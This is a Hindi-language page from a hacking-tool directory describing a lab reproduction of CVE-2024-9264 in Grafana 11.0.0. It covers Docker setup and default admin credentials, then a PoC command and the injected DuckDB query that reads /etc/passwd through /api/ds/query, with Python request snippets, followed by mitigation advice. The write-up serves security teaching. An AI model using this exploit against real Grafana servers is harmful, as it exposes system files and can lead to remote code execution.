Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-9264 | Kitploit
उपकरण/GitHubGitHub/yeonchoda/cve-2024-9264
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubyeonchoda/cve-2024-9264

CVE-2024-9264

रिपॉजिटरी देखें
1 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-9264

संदर्भ दस्तावेज़ https://github.com/vulhub/vulhub/tree/master/grafana/CVE-2024-9264

1. भेद्यता सारांश

आइटमविवरण
CVECVE-2024-9264
लक्ष्यGrafana (SQL Expressions)
प्रभावLocal File Inclusion (LFI), Remote Code Execution (RCE)
गंभीरताCritical (CVSS 9.9)
हमले की शर्तप्रमाणित उपयोगकर्ता (Admin अधिकार)
हमले का तरीकाSQL Expression सुविधा का दुरुपयोग करके DuckDB SQL निष्पादित करना

Grafana एक ओपन-सोर्स मॉनिटरिंग टूल है जो सर्वर, एप्लिकेशन, डेटाबेस आदि के विभिन्न डेटा को आसानी से देखने योग्य ग्राफ़ या डैशबोर्ड के रूप में विज़ुअलाइज़ करता है।

CVE-2024-9264, Grafana की SQL Expressions सुविधा में उत्पन्न होने वाली भेद्यता है।

Grafana आंतरिक रूप से उपयोग होने वाले DuckDB SQL का उचित रूप से सत्यापन नहीं करता है, जिससे हमलावर SQL Expression के माध्यम से मनमाना DuckDB SQL निष्पादित कर सकता है।

इसका उपयोग करके निम्नलिखित संभव है:

  • सर्वर की लोकल फ़ाइल पढ़ना (LFI)
  • सिस्टम कमांड निष्पादन (RCE)
  • संवेदनशील जानकारी का रिसाव

आदि।

इस अभ्यास में, Docker वातावरण में Grafana 11.0.0 चलाने के बाद PoC का उपयोग करके /etc/passwd फ़ाइल को पढ़ने के तरीके से भेद्यता को पुनः प्रस्तुत किया गया।


2. पर्यावरण सेटअप

अभ्यास पर्यावरण

घटकविवरण
OSUbuntu
DockerDocker Compose
Grafana11.0.0

रिपॉज़िटरी डाउनलोड करें

root@kitploit:~
git clone https://github.com/yeonchoda/CVE-2024-9264
cd CVE-2024-9264

Docker चलाएँ

root@kitploit:~
docker-compose up

Grafana चालू होने की पुष्टि करें

root@kitploit:~
http://localhost:3000

Grafana चालू

Grafana के डिफ़ॉल्ट खाते की जानकारी निम्नलिखित है।

root@kitploit:~
ID : admin
PW : admin

3. भेद्यता की शर्तें

भेद्यता उत्पन्न होने के लिए निम्नलिखित शर्तें पूरी होनी चाहिए।

  • Grafana के भेद्य संस्करण का उपयोग
  • SQL Expressions सुविधा उपलब्ध होना
  • हमलावर का Grafana में लॉगिन करने में सक्षम होना
  • DuckDB SQL Expression सक्षम होना

इस अभ्यास में डिफ़ॉल्ट व्यवस्थापक (admin/admin) खाते का उपयोग किया गया।


4. पुनरुत्पादन

PoC चलाना

लोकल फ़ाइल पढ़ने के लिए निम्नलिखित कमांड चलाई गई।

root@kitploit:~
python3 PoC.py -u http://localhost:3000 -f "/etc/passwd"

PoC निम्नलिखित SQL Expression उत्पन्न करता है।

root@kitploit:~
SELECT * FROM read_csv_auto('/etc/passwd')

इसे Grafana के /api/ds/query API के माध्यम से भेजा जाता है।


परिणाम की पुष्टि

Grafana ने SQL को वैसे ही निष्पादित करते हुए /etc/passwd की सामग्री को प्रतिक्रिया के रूप में लौटाया।

PoC.py चलाना

/etc/passwd फ़ाइल के अलावा अन्य फ़ाइलें भी देखी जा सकती हैं। /etc/group आउटपुट

इसके माध्यम से पुष्टि हुई कि Local File Inclusion सफलतापूर्वक निष्पादित हुई।


5. PoC कोड

PoC Python में लिखा गया है और निम्नलिखित प्रक्रिया निष्पादित करता है।

  1. Grafana API (/api/ds/query) को कॉल करना
  2. SQL Expression उत्पन्न करना
  3. JSON फ़ॉर्मेट में अनुरोध भेजना
  4. प्रतिक्रिया (JSON) का पार्स करना
  5. फ़ाइल की सामग्री प्रदर्शित करना

फ़ाइल पढ़ते समय उत्पन्न होने वाला SQL निम्नलिखित है।

root@kitploit:~
sql_query = f"SELECT * FROM read_csv_auto('{args.file}')"

API अनुरोध निम्नलिखित रूप से निष्पादित होता है।

root@kitploit:~
response = requests.post(
    api_url,
    auth=(username, password),
    headers=headers,
    data=json.dumps(payload),
    verify=False
)

इसे curl कमांड के माध्यम से भी देखा जा सकता है। curl

6. निवारण उपाय

1. Grafana को नवीनतम संस्करण में अपडेट करें

सबसे प्रभावी उपाय भेद्यता को ठीक करने वाले नवीनतम संस्करण में अपडेट करना है।


2. SQL Expressions सुविधा को सीमित करना

अनावश्यक SQL Expression सुविधा को अक्षम करें या न्यूनतम विशेषाधिकार सिद्धांत लागू करके उपयोग की सीमा को प्रतिबंधित करें।


3. व्यवस्थापक खाते की सुरक्षा

  • डिफ़ॉल्ट खाता (admin/admin) बदलें
  • मजबूत पासवर्ड का उपयोग करें
  • व्यवस्थापक खातों को न्यूनतम रखें

निष्कर्ष

Docker वातावरण में Grafana 11.0.0 स्थापित करने के बाद CVE-2024-9264 भेद्यता को पुनः प्रस्तुत किया गया।

Python में लिखे गए PoC का उपयोग करके SQL Expression सुविधा का दुरुपयोग करते हुए /etc/passwd फ़ाइल को पढ़ने में सफलता मिली। इसके माध्यम से यह पुष्टि हुई कि SQL Expression के इनपुट सत्यापन की कमी होने पर संवेदनशील फ़ाइलें उजागर हो सकती हैं, और पर्यावरण के आधार पर यह रिमोट कोड निष्पादन (RCE) तक भी पहुँच सकता है। इस प्रकार की भेद्यता को नवीनतम संस्करण में अपडेट, SQL Expression सुविधा को सीमित करने, और व्यवस्थापक खाते की सुरक्षा जैसे सुरक्षा उपायों के माध्यम से रोका जा सकता है।

टूल डाउनलोड करें